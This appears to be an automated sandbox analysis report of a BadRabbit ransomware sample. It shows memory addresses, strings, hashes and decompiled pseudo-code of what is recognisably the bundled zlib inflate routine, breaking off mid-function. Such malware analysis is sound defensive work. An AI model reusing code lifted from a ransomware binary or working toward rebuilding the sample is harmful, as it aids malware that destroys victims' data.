                                                                                                                                                                                        0x0132288b
                                                                                                                                                                                        0x0132288b
                                                                                                                                                                                        0x0132288d
                                                                                                                                                                                        0x01322890
                                                                                                                                                                                        0x01322893
                                                                                                                                                                                        0x01322893
                                                                                                                                                                                        0x01322895
                                                                                                                                                                                        0x01322895
                                                                                                                                                                                        0x01322898
                                                                                                                                                                                        0x0132289a
                                                                                                                                                                                        0x013228a1
                                                                                                                                                                                        0x013228a7
                                                                                                                                                                                        0x013228aa
                                                                                                                                                                                        0x013228ad
                                                                                                                                                                                        0x013228ad
                                                                                                                                                                                        0x013228af
                                                                                                                                                                                        0x013228af
                                                                                                                                                                                        0x013228b2
                                                                                                                                                                                        0x013228b4
                                                                                                                                                                                        0x013228b5
                                                                                                                                                                                        0x013228b5
                                                                                                                                                                                        0x013228b5
                                                                                                                                                                                        0x013228b8
                                                                                                                                                                                        0x013228bb
                                                                                                                                                                                        0x013228be
                                                                                                                                                                                        0x013228c1
                                                                                                                                                                                        0x013228c4
                                                                                                                                                                                        0x013228ca
                                                                                                                                                                                        0x013228ca
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013228c4
                                                                                                                                                                                        0x01322849
                                                                                                                                                                                        0x01322849
                                                                                                                                                                                        0x0132284b
                                                                                                                                                                                        0x0132284e
                                                                                                                                                                                        0x01322865
                                                                                                                                                                                        0x01322865
                                                                                                                                                                                        0x01322868
                                                                                                                                                                                        0x0132286b
                                                                                                                                                                                        0x01322879
                                                                                                                                                                                        0x01322879
                                                                                                                                                                                        0x0132286d
                                                                                                                                                                                        0x0132286d
                                                                                                                                                                                        0x01322873
                                                                                                                                                                                        0x01322873
                                                                                                                                                                                        0x0132287c
                                                                                                                                                                                        0x0132287f
                                                                                                                                                                                        0x01322882
                                                                                                                                                                                        0x01322884
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322886
                                                                                                                                                                                        0x01322886
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322886
                                                                                                                                                                                        0x01322884
                                                                                                                                                                                        0x01322850
                                                                                                                                                                                        0x01322850
                                                                                                                                                                                        0x01322857
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322859

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
                                                                                                                                                                                        • Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: Oet$8 Oet$8 Oet$invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                        • API String ID: 0-3085564239
                                                                                                                                                                                        • Opcode ID: ad925db56aeca51c25d9ebd8276e7b97742b47c1735a17cbbcc10330c4aa2cdc
                                                                                                                                                                                        • Instruction ID: 304733c20f51d9dc9776b77dddbd18804b4fcd43b26aa5b9731a3301a27d9e07
                                                                                                                                                                                        • Opcode Fuzzy Hash: ad925db56aeca51c25d9ebd8276e7b97742b47c1735a17cbbcc10330c4aa2cdc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 98627B71E00629DFDF18DF59C8906ADBBF2FF88314B1481AAD956AB785D7349A40CF80
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E0132173C(signed int _a4, intOrPtr _a8) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                        				signed char _v21;
                                                                                                                                                                                        				signed char _v22;
                                                                                                                                                                                        				signed char _v23;
                                                                                                                                                                                        				signed char _v24;
                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                        				unsigned int _v40;
                                                                                                                                                                                        				int _v44;
                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                                        				signed int _v54;
                                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                                        				signed int _v2097152004;
                                                                                                                                                                                        				void* _t774;
                                                                                                                                                                                        				signed int _t776;
                                                                                                                                                                                        				signed int* _t815;
                                                                                                                                                                                        				signed int _t819;
                                                                                                                                                                                        				signed int _t834;
                                                                                                                                                                                        				signed int _t844;
                                                                                                                                                                                        				intOrPtr* _t847;
                                                                                                                                                                                        				intOrPtr _t849;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t1 =  &_a4; // 0x38
                                                                                                                                                                                        				_t847 =  *_t1;
                                                                                                                                                                                        				if(_t847 == 0) {
                                                                                                                                                                                        					L144:
                                                                                                                                                                                        					_push(0xfffffffe);
                                                                                                                                                                                        					L145:
                                                                                                                                                                                        					_pop(_t774);
                                                                                                                                                                                        					return _t774;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t815 =  *(_t847 + 0x1c);
                                                                                                                                                                                        				_v40 = _t815;
                                                                                                                                                                                        				if(_t815 != 0 &&  *((intOrPtr*)(_t847 + 0xc)) != 0 && ( *_t847 != 0 ||  *(_t847 + 4) == 0)) {
                                                                                                                                                                                        					if( *_t815 == 0xb) {
                                                                                                                                                                                        						 *_t815 = 0xc;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t834 = _t815[0xe];
                                                                                                                                                                                        					_t844 = _t815[0xf];
                                                                                                                                                                                        					_v32 =  *((intOrPtr*)(_t847 + 0xc));
                                                                                                                                                                                        					_v28 =  *((intOrPtr*)(_t847 + 0x10));
                                                                                                                                                                                        					_v12 =  *_t847;
                                                                                                                                                                                        					_t819 =  *(_t847 + 4);
                                                                                                                                                                                        					_v36 = 0;
                                                                                                                                                                                        					_t776 =  *_t815;
                                                                                                                                                                                        					_v8 = _t819;
                                                                                                                                                                                        					_v16 = _t834;
                                                                                                                                                                                        					_v20 = _t844;
                                                                                                                                                                                        					_v60 = _t819;
                                                                                                                                                                                        					_v44 = _v28;
                                                                                                                                                                                        					if(_t776 <= 0x1e) {
                                                                                                                                                                                        						_t21 =  &_a4; // 0x38
                                                                                                                                                                                        						_t849 =  *_t21;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							switch( *((intOrPtr*)(_t776 * 4 +  &M01322B54))) {
                                                                                                                                                                                        								case 0:
                                                                                                                                                                                        									if(_t815[2] != 0) {
                                                                                                                                                                                        										_push(0x10);
                                                                                                                                                                                        										_pop(_t777);
                                                                                                                                                                                        										__eflags = _t844 - _t777;
                                                                                                                                                                                        										if(_t844 >= _t777) {
                                                                                                                                                                                        											L16:
                                                                                                                                                                                        											__eflags = _t815[2] & 0x00000002;
                                                                                                                                                                                        											if((_t815[2] & 0x00000002) == 0) {
                                                                                                                                                                                        												L19:
                                                                                                                                                                                        												_t815[4] = _t815[4] & 0x00000000;
                                                                                                                                                                                        												_t778 = _t815[8];
                                                                                                                                                                                        												__eflags = _t778;
                                                                                                                                                                                        												if(_t778 != 0) {
                                                                                                                                                                                        													_t46 = _t778 + 0x30;
                                                                                                                                                                                        													 *_t46 =  *(_t778 + 0x30) | 0xffffffff;
                                                                                                                                                                                        													__eflags =  *_t46;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__eflags = _t815[2] & 0x00000001;
                                                                                                                                                                                        												if((_t815[2] & 0x00000001) == 0) {
                                                                                                                                                                                        													L32:
                                                                                                                                                                                        													 *(_t849 + 0x18) = "incorrect header check";
                                                                                                                                                                                        													goto L25;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t781 = (_t834 >> 8) + ((_t834 & 0x000000ff) << 8);
                                                                                                                                                                                        												_push(0x1f);
                                                                                                                                                                                        												_pop(_t822);
                                                                                                                                                                                        												__eflags = _t781 % _t822;
                                                                                                                                                                                        												_t834 = _v16;
                                                                                                                                                                                        												if(_t781 % _t822 != 0) {
                                                                                                                                                                                        													goto L32;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__eflags = (_t834 & 0x0000000f) - 8;
                                                                                                                                                                                        												if((_t834 & 0x0000000f) == 8) {
                                                                                                                                                                                        													_t834 = _t834 >> 4;
                                                                                                                                                                                        													_t844 = _t844 - 4;
                                                                                                                                                                                        													_v16 = _t834;
                                                                                                                                                                                        													_v20 = _t844;
                                                                                                                                                                                        													_t825 = (_t834 & 0x0000000f) + 8;
                                                                                                                                                                                        													__eflags = _t815[9];
                                                                                                                                                                                        													if(_t815[9] != 0) {
                                                                                                                                                                                        														__eflags = _t825 - _t815[9];
                                                                                                                                                                                        														if(_t825 <= _t815[9]) {
                                                                                                                                                                                        															goto L28;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														 *(_t849 + 0x18) = "invalid window size";
                                                                                                                                                                                        														goto L25;
                                                                                                                                                                                        													} else {
                                                                                                                                                                                        														_t815[9] = _t825;
                                                                                                                                                                                        														L28:
                                                                                                                                                                                        														_t844 = 0;
                                                                                                                                                                                        														_t815[5] = 1 << _t825;
                                                                                                                                                                                        														_t788 = E01322E91(0, 0, 0);
                                                                                                                                                                                        														_t815[6] = _t788;
                                                                                                                                                                                        														 *(_t849 + 0x30) = _t788;
                                                                                                                                                                                        														_t843 =  !(_v16 >> 8) & 0x00000002 | 0x00000009;
                                                                                                                                                                                        														__eflags = _t843;
                                                                                                                                                                                        														 *_t815 = _t843;
                                                                                                                                                                                        														_t834 = 0;
                                                                                                                                                                                        														goto L29;
                                                                                                                                                                                        													}
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													 *(_t849 + 0x18) = "unknown compression method";
                                                                                                                                                                                        													goto L25;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eflags = _t834 - 0x8b1f;
                                                                                                                                                                                        											if(_t834 != 0x8b1f) {
                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_t844 = 0;
                                                                                                                                                                                        												_t815[6] = E013230C1(0, 0, 0);
                                                                                                                                                                                        												_push(0x1f);
                                                                                                                                                                                        												_pop(_t790);
                                                                                                                                                                                        												_v24 = _t790;
                                                                                                                                                                                        												_v23 = 0x8b;
                                                                                                                                                                                        												_t792 = E013230C1(_t815[6],  &_v24, 2);
                                                                                                                                                                                        												_t834 = 0;
                                                                                                                                                                                        												_t815[6] = _t792;
                                                                                                                                                                                        												_v16 = 0;
                                                                                                                                                                                        												_v20 = 0;
                                                                                                                                                                                        												 *_t815 = 1;
                                                                                                                                                                                        												goto L142;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											_t25 =  &_v12; // 0x38
                                                                                                                                                                                        											_t793 =  *_t25;
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												__eflags = _t819;
                                                                                                                                                                                        												if(_t819 == 0) {
                                                                                                                                                                                        													goto L331;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_v8 = _t819 - 1;
                                                                                                                                                                                        												_t813 = ( *_t793 & 0x000000ff) << _t844;
                                                                                                                                                                                        												_t844 = _t844 + 8;
                                                                                                                                                                                        												_t819 = _v8;
                                                                                                                                                                                        												_t834 = _t834 + _t813;
                                                                                                                                                                                        												_t28 =  &_v12; // 0x38
                                                                                                                                                                                        												_t793 =  *_t28 + 1;
                                                                                                                                                                                        												_v16 = _t834;
                                                                                                                                                                                        												_v12 = _t793;
                                                                                                                                                                                        												_v20 = _t844;
                                                                                                                                                                                        												__eflags = _t844 - 0x10;
                                                                                                                                                                                        												if(_t844 < 0x10) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L16;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L331;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										 *_t815 = 0xc;
                                                                                                                                                                                        										goto L143;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								case 1:
                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                        									_pop(__eax);
                                                                                                                                                                                        									__eflags = __edi - __eax;
                                                                                                                                                                                        									if(__edi >= __eax) {
                                                                                                                                                                                        										L37:
                                                                                                                                                                                        										 *(__ebx + 0x10) = __edx;
                                                                                                                                                                                        										__eflags = __dl - 8;
                                                                                                                                                                                        										if(__dl == 8) {
                                                                                                                                                                                        											__eflags = __edx & 0x0000e000;
                                                                                                                                                                                        											if((__edx & 0x0000e000) == 0) {
                                                                                                                                                                                        												__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        												if(__ecx != 0) {
                                                                                                                                                                                        													__edx = __edx >> 8;
                                                                                                                                                                                        													__eax = __edx >> 0x00000008 & 0x00000001;
                                                                                                                                                                                        													__eflags = __eax;
                                                                                                                                                                                        													 *__ecx = __eax;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        												if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        													_v24 = __dl;
                                                                                                                                                                                        													__eax =  &_v24;
                                                                                                                                                                                        													__eflags = __edx;
                                                                                                                                                                                        													_v23 = __dl;
                                                                                                                                                                                        													 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  &_v24, 2);
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__ecx = _v8;
                                                                                                                                                                                        												__eax = 0;
                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                        												__edx = 0;
                                                                                                                                                                                        												 *__ebx = 2;
                                                                                                                                                                                        												_v16 = 0;
                                                                                                                                                                                        												__edi = 0;
                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											 *(__esi + 0x18) = "unknown header flags set";
                                                                                                                                                                                        											goto L39;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										 *(__esi + 0x18) = "unknown compression method";
                                                                                                                                                                                        										goto L39;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t70 =  &_v12; // 0x38
                                                                                                                                                                                        									__eax =  *_t70;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L331;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										_v8 = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_t73 =  &_v12; // 0x38
                                                                                                                                                                                        										__eax =  *_t73;
                                                                                                                                                                                        										__eax =  *_t73 + 1;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										_v12 = __eax;
                                                                                                                                                                                        										_v20 = __edi;
                                                                                                                                                                                        										__eflags = __edi - 0x10;
                                                                                                                                                                                        										if(__edi < 0x10) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L331;
                                                                                                                                                                                        								case 2:
                                                                                                                                                                                        									L47:
                                                                                                                                                                                        									__eflags = __edi - 0x20;
                                                                                                                                                                                        									if(__edi >= 0x20) {
                                                                                                                                                                                        										L51:
                                                                                                                                                                                        										__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											 *(__eax + 4) = __edx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        											__eax = __edx;
                                                                                                                                                                                        											_v24 = __dl;
                                                                                                                                                                                        											__eax = __edx >> 8;
                                                                                                                                                                                        											_v23 = __al;
                                                                                                                                                                                        											__edx = __edx >> 0x10;
                                                                                                                                                                                        											_v22 = __al;
                                                                                                                                                                                        											__eax =  &_v24;
                                                                                                                                                                                        											__eflags = __edx;
                                                                                                                                                                                        											_v21 = __dl;
                                                                                                                                                                                        											 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  &_v24, 4);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										 *__ebx = 3;
                                                                                                                                                                                        										_v16 = 0;
                                                                                                                                                                                        										__edi = 0;
                                                                                                                                                                                        										goto L56;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t93 =  &_v12; // 0x38
                                                                                                                                                                                        									__eax =  *_t93;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L331;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										_v8 = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_t96 =  &_v12; // 0x38
                                                                                                                                                                                        										__eax =  *_t96;
                                                                                                                                                                                        										__eax =  *_t96 + 1;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										_v12 = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi < 0x20) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L51;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L331;
                                                                                                                                                                                        								case 3:
                                                                                                                                                                                        									L56:
                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                        									_pop(__eax);
                                                                                                                                                                                        									__eflags = __edi - __eax;
                                                                                                                                                                                        									if(__edi >= __eax) {
                                                                                                                                                                                        										L60:
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx != 0) {
                                                                                                                                                                                        											__eax = __dl & 0x000000ff;
                                                                                                                                                                                        											 *(__ecx + 8) = __dl & 0x000000ff;
                                                                                                                                                                                        											__ecx = __edx;
                                                                                                                                                                                        											__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        											__ecx = __edx >> 8;
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											 *( *(__ebx + 0x20) + 0xc) = __ecx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        											_v24 = __dl;
                                                                                                                                                                                        											__eax =  &_v24;
                                                                                                                                                                                        											__eflags = __edx;
                                                                                                                                                                                        											_v23 = __dl;
                                                                                                                                                                                        											 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  &_v24, 2);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										 *__ebx = 4;
                                                                                                                                                                                        										__edi = 0;
                                                                                                                                                                                        										_v16 = 0;
                                                                                                                                                                                        										_v20 = 0;
                                                                                                                                                                                        										goto L65;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t113 =  &_v12; // 0x38
                                                                                                                                                                                        									__eax =  *_t113;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L331;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										_v8 = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_t116 =  &_v12; // 0x38
                                                                                                                                                                                        										__eax =  *_t116;
                                                                                                                                                                                        										__eax =  *_t116 + 1;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										_v12 = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x10;
                                                                                                                                                                                        										if(__edi < 0x10) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L60;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L331;
                                                                                                                                                                                        								case 4:
                                                                                                                                                                                        									L65:
                                                                                                                                                                                        									__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                                                                                                        									if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                                                                                                        										__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											_t157 = __eax + 0x10;
                                                                                                                                                                                        											 *_t157 =  *(__eax + 0x10) & 0x00000000;
                                                                                                                                                                                        											__eflags =  *_t157;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L77:
                                                                                                                                                                                        										 *__ebx = 5;
                                                                                                                                                                                        										goto L78;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                        									_pop(__eax);
                                                                                                                                                                                        									__eflags = __edi - __eax;
                                                                                                                                                                                        									if(__edi >= __eax) {
                                                                                                                                                                                        										L70:
                                                                                                                                                                                        										__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        										 *(__ebx + 0x40) = __edx;
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											 *(__eax + 0x14) = __edx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        											_v24 = __dl;
                                                                                                                                                                                        											__eax =  &_v24;
                                                                                                                                                                                        											__eflags = __edx;
                                                                                                                                                                                        											_v23 = __dl;
                                                                                                                                                                                        											 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  &_v24, 2);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__edi = 0;
                                                                                                                                                                                        										_v16 = 0;
                                                                                                                                                                                        										_v20 = 0;
                                                                                                                                                                                        										goto L77;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t137 =  &_v12; // 0x38
                                                                                                                                                                                        									__eax =  *_t137;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L331;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										_v8 = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_t140 =  &_v12; // 0x38
                                                                                                                                                                                        										__eax =  *_t140;
                                                                                                                                                                                        										__eax =  *_t140 + 1;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										_v12 = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x10;
                                                                                                                                                                                        										if(__edi < 0x10) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L70;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L331;
                                                                                                                                                                                        								case 5:
                                                                                                                                                                                        									L78:
                                                                                                                                                                                        									__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                                                                                                        									if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										L92:
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										 *(__ebx + 0x40) = __edx;
                                                                                                                                                                                        										 *__ebx = 6;
                                                                                                                                                                                        										goto L94;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__ecx =  *(__ebx + 0x40);
                                                                                                                                                                                        									__edx = _v8;
                                                                                                                                                                                        									__eflags = __ecx - __edx;
                                                                                                                                                                                        									__ecx = (__ecx > __edx) ? __edx : __ecx;
                                                                                                                                                                                        									_v52 = __ecx;
                                                                                                                                                                                        									__eflags = __ecx;
                                                                                                                                                                                        									if(__ecx != 0) {
                                                                                                                                                                                        										__edx =  *(__ebx + 0x20);
                                                                                                                                                                                        										__eflags = __edx;
                                                                                                                                                                                        										if(__edx != 0) {
                                                                                                                                                                                        											__eax =  *(__edx + 0x10);
                                                                                                                                                                                        											_v48 = __eax;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax != 0) {
                                                                                                                                                                                        												__eax =  *(__edx + 0x14);
                                                                                                                                                                                        												__eax =  *(__edx + 0x14) -  *(__ebx + 0x40);
                                                                                                                                                                                        												__edx =  *(__edx + 0x18);
                                                                                                                                                                                        												_v56 = __eax;
                                                                                                                                                                                        												__eflags = __eax - __edx;
                                                                                                                                                                                        												__eax = _v56;
                                                                                                                                                                                        												if(__eflags <= 0) {
                                                                                                                                                                                        													__edx = __ecx;
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													__edx = __edx - __eax;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t173 =  &_v12; // 0x38
                                                                                                                                                                                        												__ecx =  *_t173;
                                                                                                                                                                                        												__eax = __eax + _v48;
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												__eax = memcpy(__eax,  *_t173, __edx);
                                                                                                                                                                                        												__ecx = _v52;
                                                                                                                                                                                        												__esp = __esp + 0xc;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        											_t179 =  &_v12; // 0x38
                                                                                                                                                                                        											 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  *_t179, __ecx);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax = _v52;
                                                                                                                                                                                        										_v8 = _v8 - __eax;
                                                                                                                                                                                        										_v12 = _v12 + __eax;
                                                                                                                                                                                        										_t187 = __ebx + 0x40;
                                                                                                                                                                                        										 *_t187 =  *(__ebx + 0x40) - __eax;
                                                                                                                                                                                        										__eflags =  *_t187;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__edx = 0;
                                                                                                                                                                                        									__eflags =  *(__ebx + 0x40);
                                                                                                                                                                                        									if( *(__ebx + 0x40) != 0) {
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										goto L92;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								case 6:
                                                                                                                                                                                        									__edx = 0;
                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                        									L94:
                                                                                                                                                                                        									__eflags =  *(__ebx + 0x10) & 0x00000800;
                                                                                                                                                                                        									if(( *(__ebx + 0x10) & 0x00000800) == 0) {
                                                                                                                                                                                        										__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											 *(__eax + 0x1c) = __edx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L110:
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										 *__ebx = 7;
                                                                                                                                                                                        										 *(__ebx + 0x40) = 0;
                                                                                                                                                                                        										goto L112;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags = __ecx;
                                                                                                                                                                                        									if(__ecx == 0) {
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__esi = _v8;
                                                                                                                                                                                        									__eax = __edx;
                                                                                                                                                                                        									_t196 =  &_v12; // 0x38
                                                                                                                                                                                        									__edx =  *_t196;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                                                        										__eax = __eax + 1;
                                                                                                                                                                                        										_v48 = __ecx;
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        										_v56 = __eax;
